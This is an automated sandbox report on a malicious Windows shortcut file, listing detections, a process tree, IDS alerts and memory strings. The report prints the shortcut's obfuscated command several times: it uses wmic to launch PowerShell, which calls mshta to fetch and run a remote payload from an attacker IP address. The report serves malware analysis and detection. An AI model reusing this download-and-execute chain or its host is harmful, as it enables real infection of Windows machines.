Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
6G4au3vWsI.lnk

Overview

General Information

Sample name:6G4au3vWsI.lnk
renamed because original name is a hash value
Original sample name:2b4f800413a890176ebfec3ccc57fcbb.lnk
Analysis ID:1569818
MD5:2b4f800413a890176ebfec3ccc57fcbb
SHA1:2411ba93cc9bfbc4498faf4b156d0fbfaefd03ca
SHA256:9c9e8ac1e4fa6cd293e72c02e35417042e55ee3ee70a4460b0fce1d320e183c5
Tags:lnkuser-abuse_ch
Infos:

Detection

Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Contains functionality to create processes via WMI
Creates processes via WMI
Machine Learning detection for sample
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious Process Created Via Wmic.EXE
Suspicious powershell command line found
Windows shortcut file (LNK) contains suspicious command line arguments
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • WMIC.exe (PID: 7384 cmdline: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell iex '\*i*\S*3*\m*ta.e* https://80.76.51.231/Samarik' | powershell -" MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • conhost.exe (PID: 7416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7488 cmdline: powershell iex '\*i*\S*3*\m*ta.e* https://80.76.51.231/Samarik' | powershell - MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • mshta.exe (PID: 7652 cmdline: "C:\Windows\System32\mshta.exe" https://80.76.51.231/Samarik MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
      • powershell.exe (PID: 7668 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" - MD5: 04029E121A0CFA5991749937DD22A1D9)
  • svchost.exe (PID: 6552 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Potentially Suspicious PowerShell Child Processes
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\mshta.exe" https://80.76.51.231/Samarik, CommandLine: "C:\Windows\System32\mshta.exe" https://80.76.51.231/Samarik, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: powershell iex '\*i*\S*3*\m*ta.e* https://80.76.51.231/Samarik' | powershell -, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7488, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\mshta.exe" https://80.76.51.231/Samarik, ProcessId: 7652, ProcessName: mshta.exe
Sigma detected: Suspicious Process Created Via Wmic.EXE
Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell iex '\*i*\S*3*\m*ta.e* https://80.76.51.231/Samarik' | powershell -", CommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell iex '\*i*\S*3*\m*ta.e* https://80.76.51.231/Samarik' | powershell -", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell iex '\*i*\S*3*\m*ta.e* https://80.76.51.231/Samarik' | powershell -", ProcessId: 7384, ProcessName: WMIC.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell iex '\*i*\S*3*\m*ta.e* https://80.76.51.231/Samarik' | powershell -, CommandLine: powershell iex '\*i*\S*3*\m*ta.e* https://80.76.51.231/Samarik' | powershell -, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell iex '\*i*\S*3*\m*ta.e* https://80.76.51.231/Samarik' | powershell -", ParentImage: C:\Windows\System32\wbem\WMIC.exe, ParentProcessId: 7384, ParentProcessName: WMIC.exe, ProcessCommandLine: powershell iex '\*i*\S*3*\m*ta.e* https://80.76.51.231/Samarik' | powershell -, ProcessId: 7488, ProcessName: powershell.exe
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6552, ProcessName: svchost.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-06T10:27:48.742769+010020287653Unknown Traffic192.168.2.94970780.76.51.231443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: https://80.76.51.231/Samarik/Avira URL Cloud: Label: malware
Source: https://80.76.51.231/SamarikAvira URL Cloud: Label: malware
Source: https://80.76.51.231/Samarik...Avira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: 6G4au3vWsI.lnkReversingLabs: Detection: 26%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.0% probability
Machine Learning detection for sample
Source: 6G4au3vWsI.lnkJoe Sandbox ML: detected
Source: Binary string: Microsoft.Powershell.PSReadline.pdbY source: powershell.exe, 00000006.00000002.1464128230.00000221F4FC0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000006.00000002.1465320420.00000221F52DA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1464128230.00000221F50AC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Core.pdb8* source: powershell.exe, 00000006.00000002.1464128230.00000221F50AC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadLine.PDBJn source: powershell.exe, 00000006.00000002.1465320420.00000221F52DA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Core.pdb source: powershell.exe, 00000006.00000002.1464128230.00000221F50AC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000006.00000002.1465320420.00000221F52DA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Core.pdb source: powershell.exe, 00000006.00000002.1464128230.00000221F50AC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\Z:\syscalls\amsi64_7668.amsi.csve.pdb source: powershell.exe, 00000006.00000002.1464128230.00000221F5012000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000006.00000002.1464128230.00000221F507B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1465320420.00000221F5323000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Core.pdbpdbore.pdb2 source: powershell.exe, 00000006.00000002.1464128230.00000221F5012000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Powershell.PSReadline.pdbyh source: powershell.exe, 00000006.00000002.1465320420.00000221F52DA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000006.00000002.1464128230.00000221F50AC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1464128230.00000221F507B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1464128230.00000221F4FC0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000006.00000002.1465320420.00000221F52DA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbH source: powershell.exe, 00000006.00000002.1465320420.00000221F52DA000.00000004.00000020.00020000.00000000.sdmp
Source: Joe Sandbox ViewASN Name: CLOUDCOMPUTINGDE CLOUDCOMPUTINGDE
Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49707 -> 80.76.51.231:443
Source: unknownTCP traffic detected without corresponding DNS query: 80.76.51.231
Source: unknownTCP traffic detected without corresponding DNS query: 80.76.51.231
Source: unknownTCP traffic detected without corresponding DNS query: 80.76.51.231
Source: unknownTCP traffic detected without corresponding DNS query: 80.76.51.231
Source: unknownTCP traffic detected without corresponding DNS query: 80.76.51.231
Source: unknownTCP traffic detected without corresponding DNS query: 80.76.51.231
Source: unknownTCP traffic detected without corresponding DNS query: 80.76.51.231
Source: unknownTCP traffic detected without corresponding DNS query: 80.76.51.231
Source: unknownTCP traffic detected without corresponding DNS query: 80.76.51.231
Source: unknownTCP traffic detected without corresponding DNS query: 80.76.51.231
Source: unknownTCP traffic detected without corresponding DNS query: 80.76.51.231
Source: unknownTCP traffic detected without corresponding DNS query: 80.76.51.231
Source: unknownTCP traffic detected without corresponding DNS query: 80.76.51.231
Source: unknownTCP traffic detected without corresponding DNS query: 80.76.51.231
Source: svchost.exe, 0000000B.00000002.2639952714.000001B0F0A85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: qmgr.db.11.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.11.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.11.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.11.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.11.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.11.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: qmgr.db.11.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000006.00000002.1444531399.00000221802D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1459332555.00000221901C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1444531399.0000022181B8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1459332555.000002219008D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000006.00000002.1444531399.0000022181B30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000006.00000002.1444531399.0000022180001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.1444531399.000002218192C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000006.00000002.1444531399.0000022181B30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000006.00000002.1464128230.00000221F507B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
Source: mshta.exe, 00000005.00000002.2637014653.0000023A49352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://80.76.51.231/
Source: mshta.exe, 00000005.00000002.2637014653.0000023A492B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2637014653.0000023A492A0000.00000004.00000020.00020000.00000000.sdmp, 6G4au3vWsI.lnkString found in binary or memory: https://80.76.51.231/Samarik
Source: mshta.exe, 00000005.00000002.2637014653.0000023A492B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://80.76.51.231/Samarik-1-0/
Source: mshta.exe, 00000005.00000002.2637014653.0000023A4936E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2637014653.0000023A49359000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://80.76.51.231/Samarik...
Source: mshta.exe, 00000005.00000002.2637014653.0000023A49318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://80.76.51.231/Samarik/
Source: mshta.exe, 00000005.00000002.2637014653.0000023A492B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://80.76.51.231/Samarik1-1-0#
Source: mshta.exe, 00000005.00000002.2637715324.0000023A494D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://80.76.51.231/Samarik=
Source: mshta.exe, 00000005.00000002.2637014653.0000023A492A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://80.76.51.231/SamarikC:
Source: mshta.exe, 00000005.00000002.2637014653.0000023A492B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://80.76.51.231/SamarikCE0B
Source: mshta.exe, 00000005.00000002.2637014653.0000023A492C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://80.76.51.231/SamarikCH&
Source: mshta.exe, 00000005.00000002.2637014653.0000023A49318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://80.76.51.231/SamarikE
Source: mshta.exe, 00000005.00000002.2636956149.0000023A49270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://80.76.51.231/SamarikH
Source: mshta.exe, 00000005.00000002.2637014653.0000023A492C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://80.76.51.231/SamarikZHO
Source: mshta.exe, 00000005.00000002.2637014653.0000023A492A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://80.76.51.231/SamarikZY~
Source: mshta.exe, 00000005.00000002.2637014653.0000023A492C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://80.76.51.231/Samarikr
Source: mshta.exe, 00000005.00000002.2637014653.0000023A492B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://80.76.51.231/Samarikuo
Source: powershell.exe, 00000006.00000002.1444531399.0000022180001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000006.00000002.1459332555.000002219008D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.1459332555.000002219008D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.1459332555.000002219008D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: qmgr.db.11.drString found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
Source: svchost.exe, 0000000B.00000003.2316039782.000001B0F0C00000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
Source: powershell.exe, 00000006.00000002.1444531399.0000022181B30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000006.00000002.1444531399.0000022180F2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: mshta.exe, 00000005.00000002.2637014653.0000023A49359000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: powershell.exe, 00000006.00000002.1444531399.00000221802D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1459332555.00000221901C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1444531399.0000022181B8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1459332555.000002219008D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000006.00000002.1444531399.000002218192C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
Source: powershell.exe, 00000006.00000002.1444531399.000002218192C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712

System Summary

barindex
Contains functionality to create processes via WMI
Source: WMIC.exe, 00000001.00000002.1400068742.0000015CD36D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\System32\Wbem\wmic.exe"C:\Windows\System32\Wbem\wmic.exe" process call create "powershell iex '\*i*\S*3*\m*ta.e* https://80.76.51.231/Samarik' | powershell -"C:\Users\user\Desktop\6G4au3vWsI.lnkWinsta0\DefaultH@wmemstr_727161a1-3
Windows shortcut file (LNK) contains suspicious command line arguments
Source: 6G4au3vWsI.lnkLNK file: process call create "powershell iex '\*i*\S*3*\m*ta.e* https://80.76.51.231/Samarik' | powershell -"
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF887A15F806_2_00007FF887A15F80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF887A2CEA06_2_00007FF887A2CEA0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF887A1DFE06_2_00007FF887A1DFE0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF887A3D3E06_2_00007FF887A3D3E0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF887A1E3186_2_00007FF887A1E318
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF887A1EAAB6_2_00007FF887A1EAAB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FF887A1BA996_2_00007FF887A1BA99
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: classification engineClassification label: mal96.evad.winLNK@9/11@0/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7496:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_osbov1la.0ms.ps1Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: 6G4au3vWsI.lnkReversingLabs: Detection: 26%
Source: unknownProcess created: C:\Windows\System32\wbem\WMIC.exe "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell iex '\*i*\S*3*\m*ta.e* https://80.76.51.231/Samarik' | powershell -"
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell iex '\*i*\S*3*\m*ta.e* https://80.76.51.231/Samarik' | powershell -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" https://80.76.51.231/Samarik
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" https://80.76.51.231/SamarikJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
